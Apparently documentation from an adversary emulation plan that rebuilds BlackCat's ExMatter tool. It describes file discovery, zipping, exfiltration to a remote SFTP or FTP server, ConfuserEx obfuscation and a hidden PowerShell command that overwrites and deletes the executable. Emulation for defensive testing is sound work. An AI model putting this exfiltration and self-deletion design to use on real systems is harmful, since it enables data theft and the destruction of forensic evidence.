After BlackCat deploys InfoStealer and successfully recovers credentials from the SQL server, the credentials are then used to remotely deploy ExMatter via a PowerShell script. Once ExMatter is deployed, it will build out a queue of files for exfiltration using a combination of inclusion/exclusion lists and file time metadata. After the list is created, ExMatter will package the files into zips and exfiltrate them to a remote SFTP server. When exfiltration is finished, ExMatter will destroy itself by spawning a PowerShell script to overwrite some bytes of its executable, and then delete the executable.

The ExMatter log file will be created in the same folder where the ExMatter executable is. The name of the log file will be EMlog.txt and will be encrypted using AES-256-CBC with the key 0370dd5addcd980e8f4b424c92d8049e99c7c7c5d09eedfcc58f6abca9e72f99. To decrypt an encrypted log file, use the alphv_blackcat/Resources/log_decryptor/aes_base64_log_decryptor.py Python utility and pass in the correct cipher and AES key:

python3 aes_base64_log_decryptor.py -i path/to/log/file -o path/to/output/file --aes-256-cbc -k 0370dd5addcd980e8f4b424c92d8049e99c7c7c5d09eedfcc58f6abca9e72f99

Alternatively, you can use the aes-tool.exe (built with the cmake pipeline) with the following command:

• aes-tool.exe -d <PATH TO LOG FILE>

If you run into permission issues for SFTP, ensure that the SFTP server is set up with the expected user credentials, and that the SFTP user has write access to its SFTP home directory.

• Discover logical drives using DriveInfo.GetDrives().
• Log drive information.
• Populate list of drives to investigate.

Recursively parse drives for files of interest, build a list of files found:

• Minimum file size: 4KB
• Maximum file size: 64MB
• Ignore files that have the System or Temporary file attribute.
• Ignore directories that are symlinks or junctions.
• Ignore these directories:

• Only include files with these extension:

• Sort the files from most to least recent last write time.
• Compress the files into zips, 100 files per zip, processing the most recently written to files first.

• Upload the zips to the SFTP server in the order that they were created. Each time ExMatter is run, it will create a unique upload directory on the remote SFTP server to store the exfiltrated archives. The upload directory name format is local hostname + timestamp (e.g. victimmachine20231129131516).
• SSH.NET is used to perform SFTP actions.

Spawn a PowerShell process that:

• Stops ExMatter process.
• Overwrites first 65535 bytes of ExMatter executable.
• Deletes ExMatter executable.

powershell.exe -WindowStyle Hidden -C $path = '[FILEPATH_OF_THE_EXECUTING_SAMPLE]';
Get-Process | Where-Object {$_.Path -like $path} | Stop-Process -Force;
[byte[]]$arr = new-object byte[] 65536;
Set-Content -Path $path -Value $arr;
Remove-Item -Path $path;

ExMatter uses ConfuserEx for obfuscation⁵. The obfuscated binary will be output to bin/Release/ExMatter.exe, and the settings used to obfuscate are here. You can use the standalone version of ConfuserEx to obfuscate ExMatter with this .crproj file with slight modifications.

Built exe files are in /bin/:

• Debug/ExMatter.exe: ExMatter built in debug mode
• Release/ExMatter.exe: ExMatter built in release mode
• aes-tool.exe: Encrypted log decryptor

ExMatter uses CMake to build. CMake will pull down ConfuserEx and ILRepack from github to use post-build. ExMatter's post-build actions are as follows:

• Build ILMerge
• Run ILMerge on ExMatter to merge the SSH.NET dll into ExMatter
• Run Confuser on ExMatter and move the finished binary to the folder in /bin/ depending on build configuration

ExMatter was tested with the included test.ps1 script, which creates "good" files for ExMatter to find and "bad" files that ExMatter shouldn't find. The SFTP server IP and credentials are hard coded, so those should be changed to reflect your environment when testing. test.ps1 is intended to be run in a high integrity context, though this is not requied.

ExMatter has a built-in debug mode when built with the ExMatter-debug configuration defined in CMakePresets.json. This mode uses compiler directives to disable encrypted logging, only target files output from test.ps1, remove files from the SFTP server after upload, and disable the powershell destructor.

ExMatter includes a small executable to decrypt its encrypted logs. ExMatter creates its log file where its exe is located. Use the following command to decrypt the logs:

• aes-tool.exe -d <PATH TO LOG FILE>

You can also run the aes-tool interactively.

# create and configure ftp root dir
sudo mkdir -p /ftproot
sudo chmod 755 /ftproot

# create and configure ftp user and group (shell needed for FTP access in case of alternative steps)
sudo groupadd sftp_users
sudo useradd -g sftp_users -s /bin/bash sftp_user
sudo passwd sftp_user

# create and configure ftp user dir
sudo mkdir -p /ftproot/sftp_user
sudo chown -R root:sftp_users /ftproot
sudo chown -R sftp_user:sftp_users /ftproot/sftp_user

# add the following to /etc/ssh/sshd_config:
Match Group sftp_users
	ChrootDirectory /ftproot
	ForceCommand internal-sftp -d /%u

# apply configurations
sudo systemctl restart sshd

# test
sftp sftp_user@<SERVER_IP>

A PowerShell version of ExMatter was created in case ExMatter fails to run. Major deviations between the two versions are as follows:

• Use the PowerShell command Compress-Archive to create the zip files instead of the C# library
• Use the PowerShell command ftp -s to upload zips to the ftp site instead of the SSH.NET library
• Use a ftp server instead of an sftp server so we can make use of the -s flag and for easier authentication
• No debug mode since we cannot use compiler directives

# vsftpd was used when testing the backup script
sudo apt-get install vsftpd

# modify the vsftpd config file
sudo nano /etc/vsftpd.conf
# append the following:
local_enable=YES
write_enable=YES

# apply configurations
sudo systemctl restart vsftpd

# test
ftp
ftp> open <SERVER_IP>